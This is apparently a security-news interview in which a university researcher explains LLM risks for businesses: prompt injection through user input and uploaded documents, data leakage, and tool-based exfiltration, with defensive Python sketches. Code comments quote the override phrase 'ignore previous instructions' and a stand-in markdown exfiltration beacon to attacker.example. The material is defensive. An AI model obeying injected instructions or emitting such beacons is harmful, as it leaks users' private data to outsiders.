Even the best safeguards can’t stop LLMs from being fooled
In this Help Net Security interview, Michael Pound, Associate Professor at the University of Nottingham, shares his insights on the cybersecurity risks associated with LLMs. He discusses common organizational mistakes and the necessary precautions for securing sensitive data when integrating LLMs into business operations.
Where do you see the biggest gaps in understanding or preparedness among CISOs and security teams when it comes to LLM use?
Many security professionals are – quite reasonably – not well versed in the underlying machine learning of LLMs. With past technologies this hasn’t been a big deal, but LLMs appear at a glance to be so capable that it’s easy to assume they can’t be fooled. That assumption leads to rushed, poorly thought-out systems that end up breaking badly in the real world. Perhaps the most important thing to remember is that most generative AI, LLMs included, is probabilistic – it acts with randomness. It has a good chance of doing what you want, but that chance is rarely 100%.
Companies pitching AI solutions talk about safeguards and alignment to suggest that their models have been developed in a way that cannot be broken. In reality, this simply means the company has tried to train the LLM to reject a set of malicious prompts it crafted itself. That reduces the chance of wayward behavior to a small value, but not to zero. Whether the LLM will reject a new and unseen prompt is something we cannot know for sure until it happens. There are many examples of new and surprising ways to convince an LLM to do something bad.
What are the most common mistakes organizations make when feeding data into LLMs, especially regarding sensitive or proprietary information?
In the short term, companies should determine who is using these tools internally, which tools, and how they are being used. Many end users don’t realise that the queries they type into these models are uploaded to the cloud, and on some services they may end up in the training data. It’s easy to upload confidential client or company information without really considering the consequences. Recent models have more than enough parameters to learn your private data and happily repeat it to someone else. Productivity apps like those that handle email or calendar scheduling have access to this information by definition. Where is it going? Paid licenses for these tools typically come with stronger usage controls and agreements in place – these are worth exploring.
In a similar way to historic SQL attacks, you must be very careful with uncontrolled user input. In testing you might ask an LLM the same question 100 times and get answers that are different but consistent. Once released, though, someone might ask a question in a slightly different way, or worse, may purposefully prompt the LLM into malicious actions. With traditional code you could control for this: you could specify “if the input doesn’t match this exacting format, reject it”. With LLMs it can be easy to write valid prompts that circumvent safeguards. The problem is actually much worse than with SQL. With SQL injection you could build in input sanitisation, parameterised queries and other mechanisms to prevent misuse; this is all but impossible for LLMs. Language models have no concept of a prompt versus the data they are using – to the model it is all the same. This also means that uploaded documents or other files a user might provide are a source of malicious prompts, not just direct text input.
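To make the contrast concrete, here is a minimal sketch (the summarise_document and llm_call names are hypothetical, not from any particular library): the SQL query keeps user input strictly as data, while the LLM prompt has no such boundary, so instructions hidden in an uploaded document are read just like the system instructions around them.

```python
import sqlite3

def fetch_orders(conn: sqlite3.Connection, customer_id: str):
    # SQL injection is preventable: the parameterised query treats the
    # user-supplied value strictly as data, never as executable SQL.
    return conn.execute(
        "SELECT * FROM orders WHERE customer_id = ?", (customer_id,)
    ).fetchall()

def summarise_document(llm_call, document_text: str) -> str:
    # There is no equivalent separation for an LLM. The uploaded document is
    # concatenated straight into the prompt, so any instructions hidden inside
    # it ("ignore previous instructions and ...") sit alongside our own.
    prompt = (
        "You are a summarisation assistant. Summarise the document below.\n\n"
        f"--- DOCUMENT ---\n{document_text}\n--- END DOCUMENT ---"
    )
    return llm_call(prompt)  # llm_call stands in for any chat/completions API
```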
The risk increases now that LLMs are being given access to tools – connections to other code and APIs. If an LLM can make web requests, there’s a chance of exfiltrating data through markdown or other URLs, and if it can also reach your private data, the risk compounds.
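One common mitigation, sketched below on the assumption that the LLM’s output is rendered as Markdown, is to strip link and image URLs that don’t point at hosts you trust, so an injected payload can’t smuggle data out in a request (the allow-list here is purely illustrative):

```python
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"example.com", "docs.example.com"}  # hypothetical allow-list

# Matches Markdown links and images: [text](url) and ![alt](url)
MD_LINK = re.compile(r"!?\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def scrub_markdown(llm_output: str) -> str:
    def replace(match: re.Match) -> str:
        host = urlparse(match.group("url")).hostname or ""
        # Keep links to trusted hosts; drop anything else, including an
        # injected ![x](https://attacker.example/?q=<secret>) beacon.
        return match.group(0) if host in ALLOWED_HOSTS else "[link removed]"
    return MD_LINK.sub(replace, llm_output)
```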
What kinds of defenses or mitigations are currently most effective in reducing the risk of LLM manipulation by adversarial inputs?
Most attempts to train models to avoid malicious prompts only hold for a short time before someone works out a new strategy that circumvents the safeguards. Your defense will depend on what you need the LLM to do. If you’re hoping to use it to summarise documents or retrieve data, you want to carefully control which documents it can read, to ensure they don’t contain malicious prompts.
If your AI is responding directly to user input – for example, from your customers – it’s inevitable that at some point someone is going to test the safeguards. You should test your LLMs regularly to see how they react, and you can also use other functions to detect and weed out problematic prompts. In some ways the rules of SQL injection still apply – the principle of least privilege and role-based access control. Set your AI system up so that the LLM can’t do damage even if it tries to.
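As a rough illustration of that principle, with hypothetical tool and role names rather than a prescribed design, the permission check lives outside the model, so even a fully jailbroken prompt can’t reach a tool its role was never granted:

```python
from typing import Callable

TOOLS: dict[str, Callable[..., str]] = {
    "search_kb": lambda query: f"results for {query!r}",           # read-only
    "get_order_status": lambda order_id: f"status of {order_id}",  # read-only
    "refund_order": lambda order_id: f"refunded {order_id}",       # destructive
}

ROLE_PERMISSIONS = {
    "customer_chatbot": {"search_kb", "get_order_status"},  # no refunds
    "internal_agent": {"search_kb", "get_order_status", "refund_order"},
}

def dispatch_tool_call(role: str, tool_name: str, **kwargs) -> str:
    # The allow-list is enforced in ordinary code, outside the model, so a
    # successful prompt injection still can't expand the LLM's privileges.
    if tool_name not in ROLE_PERMISSIONS.get(role, set()):
        return f"denied: {tool_name!r} is not available to role {role!r}"
    return TOOLS[tool_name](**kwargs)

# e.g. dispatch_tool_call("customer_chatbot", "refund_order", order_id="42")
# returns a denial no matter what the prompt said.
```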
What frameworks or guidelines do you recommend for safely integrating LLMs into business workflows?
Although it seems like we’ve been talking about LLMs for ages, they’re really only a few years old. Systems are new, and popular libraries change regularly. Good options currently include Haystack, LangChain, and Llama-Index. Most of these are built around the idea of running your own local models, which is particularly useful if you’re worried about data privacy.
The biggest models require huge resources, but more modest models offer good performance on standard hardware. If you want to test models locally, try Ollama. If you want to re-train models, which can be a very effective way of controlling their output more precisely, have a look at Unsloth. Commercial products like Copilot, ChatGPT and Anthropic Claude are also reliable, at a higher cost.
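As a sense of how little is needed to experiment locally, here is a minimal sketch against Ollama’s local HTTP API, which listens on localhost:11434 by default (the model tag is an assumption; use whichever model you have pulled):

```python
import requests

response = requests.post(
    "http://localhost:11434/api/generate",
    json={
        "model": "llama3.1",  # assumes you've already run: ollama pull llama3.1
        "prompt": "Summarise the risks of prompt injection in two sentences.",
        "stream": False,      # return one JSON object rather than a stream
    },
    timeout=120,
)
print(response.json()["response"])
```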
As LLMs become more deeply integrated into infrastructure, what long-term or systemic cybersecurity concerns can we expect?
We are in an era where we are embedding LLMs into more and more systems, and people aren’t used to how these models differ from normal software development. Imagine writing code that some of the time simply doesn’t work, or outputs something unexpected. Even an almost perfect LLM that is correct 99.9% of the time will mathematically fail once in every 1,000 calls. We need to completely rethink how we build software to ensure that non-robust LLMs can be used within robust systems. Just as we spent years closing SQL injection loopholes, with major breaches as recently as 2015, we will be spending a long time hearing about how an unexpected prompt caused an LLM to misbehave in disastrous ways.
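A back-of-the-envelope calculation makes the point, assuming a 99.9% per-call success rate and independent calls:

```python
per_call_success = 0.999

for calls in (1_000, 10_000, 100_000):
    expected_failures = calls * (1 - per_call_success)
    p_at_least_one = 1 - per_call_success ** calls
    print(f"{calls:>7} calls: ~{expected_failures:.0f} expected failures, "
          f"P(at least one) = {p_at_least_one:.3f}")
```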